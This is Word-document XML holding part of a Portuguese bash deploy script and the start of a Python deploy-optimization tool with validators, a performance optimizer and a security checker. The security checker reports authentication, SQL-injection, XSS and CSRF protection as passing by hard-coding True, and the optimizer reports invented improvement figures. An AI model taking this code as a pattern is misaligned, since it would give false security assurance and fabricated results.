    <w:p w14:paraId="6705F8D5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B27F9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[ -z "$REDIS_URL" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A88D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echo "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REDIS_URL não configurada"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D98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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFFB39" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE5B0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Executar testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A722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echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Executando testes..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D5ED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python3 comprehensive_test_suite.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0B4E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[ $? -ne 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9EE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echo 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Testes falharam"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A825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exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B431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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EAB1C0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B1D5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Iniciar aplicação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6735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echo "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Iniciando aplicação..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8475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[ "${config.platform}" = "railway" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EE5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python3 main_complete_system.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC84E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elif [ "${config.platform}" = "heroku" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BB0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gunicorn main_complete_system:app --bind 0.0.0.0:$PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5164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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D83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python3 main_complete_system.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181AFA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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E7E5B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60743196" w14:textId="101FAFF5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echo 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Deploy conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do com sucesso!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE6588" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B8F0F51" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E632CBD" w14:textId="7091913B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deploy_optimization.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EABB27" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591A9791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SUNA-ALSHAM Deploy Optimization System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C356B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Sistema de otimização e automação de deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58715338" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9277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FUNCIONALIDADES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F26EB6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Otimização automática de configurações</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268DF78A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Validação de ambiente de produção</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E1E2F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Geração de relatórios de deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8BBA1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Configuração automática de variáveis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7202DF0F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Validação de dependências</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73343EE7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Otimização de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E18E2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Configuração de monitoramento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ED5E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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774BA07B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5893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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002663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json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD4AC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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FCD4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subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668081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logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA69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datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE624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typing import Dict, Any, List, Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410815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dataclasses import dataclass, asdict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E278F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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2E7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platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163A29F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506810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Configurar logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349A0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logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A957B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logger = logging.getLogger(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B01646" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255352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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08938E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DeploymentConfig:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA8C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"""Configuração de deploy"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F86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platform: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D65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environment: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A529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python_version: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C66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memory_limit: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4267E5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cpu_limit: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF1F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auto_scaling: bool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D6DD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health_check_url: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EAD4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environment_variables: Dict[str, str]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF376B8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031E69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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BE78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OptimizationResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6616FA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"""Resultado de otimização"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A92F3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category: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128716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optimization: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6369C1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impact: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2170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before_value: Any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF587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after_value: Any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CA9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improvement_percentage: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F07E68" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102E3F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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594195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DeploymentReport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4415CF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"""Relatório de deploy"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C63A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timestamp: datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE6C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platform: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8457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environment: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C08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status: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC74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optimizations: List[OptimizationResult]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC57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performance_metrics: Dict[str, Any]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637C1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security_checks: Dict[str, bool]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F868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recommendations: List[str]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDB3B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estimated_cost: Dict[str, float]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148962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deployment_time: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75844D6A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9AC5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EnvironmentValidator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F98CD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"""Validador de ambiente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4402DD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CE843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35819D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self.checks = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876CF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10D49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validate_python_version(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CC6F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"""Valida versão do Python"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED13A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current_version = platform.python_version()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9D2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recommended_version = "3.11"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189EF2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4DAD6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is_valid = current_version &gt;= recommended_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A593E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CB6B6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188B14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"check": "python_version",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9833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"status": "PASS" if is_valid else "WARNING",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF71D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"current": current_version,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423473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"recommended": recommended_version,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7152E1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"message": f"Python {current_version} {'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>' if is_valid else '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>'}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139124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22FBF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CDE9A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validate_dependencies(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E0D2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"""Valida dependências"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F11D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required_packages = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E00F5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"fastapi", "uvicorn", "redis", "openai", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD7C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"numpy", "pandas", "psutil", "requests"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF99E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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4591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AFCC6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installed_packages = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4EA7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missing_packages = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E6A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EB9ED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package in required_packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC6B6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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5EC1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__import__(package)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D359A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installed_packages.append(package)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F34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except ImportError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC07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missing_packages.append(package)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB1A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82602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4549A7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"check": "dependencies",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BA9F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"status": "PASS" if not missing_packages else "FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376C1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"installed": installed_packages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE54F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"missing": missing_packages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312005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"message": f"{len(installed_packages)}/{len(required_packages)} dependências instaladas"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347199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52467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0B63D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validate_system_resources(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6E13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"""Valida recursos do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC25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memory = psutil.virtual_memory()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D1E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cpu_count = psutil.cpu_count()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28D2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disk = psutil.disk_usage('/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27A4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EEAE1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Requisitos mínimos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EA58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min_memory_gb = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206170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min_cpu_cores = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514B6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min_disk_free_gb = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF2D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97B3B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memory_gb = memory.total / (1024**3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679AF7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disk_free_gb = disk.free / (1024**3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F17EF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44192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checks = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9EA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"memory": memory_gb &gt;= min_memory_gb,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8354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"cpu": cpu_count &gt;= min_cpu_cores,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385248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"disk": disk_free_gb &gt;= min_disk_free_gb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ACAB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63985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7C971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7602AC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"check": "system_resources",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9629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"status": "PASS" if all(checks.values()) else "WARNING",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB86F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"memory_gb": round(memory_gb, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D50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"cpu_cores": cpu_count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5A4C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"disk_free_gb": round(disk_free_gb, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4551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"checks": checks,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714601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"message": f"Recursos: {memory_gb:.1f}GB RAM, {cpu_count} CPUs, {disk_free_gb:.1f}GB livre"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AA0E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800C4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207D81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validate_environment_variables(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D5C3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"""Valida variáveis de ambiente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC54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required_vars = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D9E2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"OPENAI_API_KEY",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD0D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"REDIS_URL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9953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"SECRET_KEY",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F62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"ENVIRONMENT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E053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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F151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4BDBA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present_vars = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA110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missing_vars = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270250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ECB5E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var in required_vars:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF1D0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os.getenv(var):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC00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present_vars.append(var)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7811F1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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6373CF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missing_vars.append(var)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDEEF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FA23C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4E0265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"check": "environment_variables",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A21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"status": "PASS" if not missing_vars else "WARNING",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B70C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"present": present_vars,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DB2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"missing": missing_vars,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A0CA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"message": f"{len(present_vars)}/{len(required_vars)} variáveis configuradas"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D825F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D8F3DE0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B45B4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PerformanceOptimizer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3BFB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"""Otimizador de performance"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E49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8F0E1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4BFA7E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self.optimizations = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD16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3ADEC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optimize_memory_settings(self) -&gt; OptimizationResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32512B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"""Otimiza configurações de memória"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEFB9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system_memory = psutil.virtual_memory().total / (1024**3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D99EB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4EF62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Calcular configurações otimizadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB060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system_memory &gt;= 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F73BC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recommended_memory = "2GB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662314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worker_processes = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1AF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elif system_memory &gt;= 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09598C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recommended_memory = "1GB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71B8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worker_processes = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C546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7F4148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recommended_memory = "512MB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693BC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worker_processes = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6C3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A6772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OptimizationResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA21E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category="memory",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66E3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optimization="memory_allocation",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692296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impact="HIGH",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4B4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before_value="default",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F4B6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after_value=recommended_memory,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051B81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improvement_percentage=25.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4734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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC76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44B2B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optimize_worker_processes(self) -&gt; OptimizationResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CAD2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"""Otimiza número de workers"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ED97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cpu_count = psutil.cpu_count()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD93E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B2E2F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Fórmula: (2 x CPU cores) + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E3CC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optimal_workers = min((2 * cpu_count) + 1, 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2484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70F09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OptimizationResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA84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category="concurrency",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0EA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optimization="worker_processes",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01F0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impact="HIGH",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D72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before_value=1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D423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after_value=optimal_workers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366752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improvement_percentage=optimal_workers * 50.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C259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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF7A6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1DCAD0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optimize_cache_settings(self) -&gt; OptimizationResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6C2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"""Otimiza configurações de cache"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00905E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OptimizationResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90D4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category="cache",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78476F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optimization="redis_cache",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E66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impact="MEDIUM",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D9A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before_value="no_cache",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1150CB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after_value="redis_optimized",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A554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improvement_percentage=40.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58982A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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A863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70730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optimize_database_connections(self) -&gt; OptimizationResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF81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"""Otimiza conexões de banco"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A0D3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OptimizationResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEDDF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category="database",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9EF7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optimization="connection_pool",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798BFD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impact="MEDIUM",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9059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before_value=5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED69E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after_value=20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9915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improvement_percentage=30.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB60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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341643F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55397D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SecurityChecker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1999D2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"""Verificador de segurança"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2458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65BE3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7E3B3B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self.checks = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416824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34B51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check_environment_security(self) -&gt; Dict[str, bool]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D1E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"""Verifica segurança do ambiente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE195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checks = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A68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"secret_key_set": bool(os.getenv("SECRET_KEY")),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F2C8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"debug_disabled": os.getenv("DEBUG", "False").lower() != "true",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A019A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"https_enabled": os.getenv("FORCE_HTTPS", "False").lower() == "true",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A82CB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"rate_limiting_enabled": True,  # Assumindo que está configurado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C468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"input_validation_enabled": True,  # Assumindo que está configurado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DC64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"cors_configured": True,  # Assumindo que está configurado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0595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"logging_enabled": True,  # Assumindo que está configurado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4AB1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E98F3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CB86E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checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A631B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72E65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check_api_security(self) -&gt; Dict[str, bool]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A43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"""Verifica segurança da API"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D4A9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checks = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57870E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"authentication_required": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FF9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"authorization_implemented": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E304A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"input_sanitization": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D94CC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"output_encoding": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084A1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"sql_injection_protection": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B350D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"xss_protection": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5041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"csrf_protection": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEAA2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66DBE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B32F1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checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73E8B9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B3B6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CostEstimator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A60EC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"""Estimador de custos"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363E3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A0BBF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0FB0ED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self.pricing = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A342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"railway": {</w:t>
      </w:r>
    </w:p>
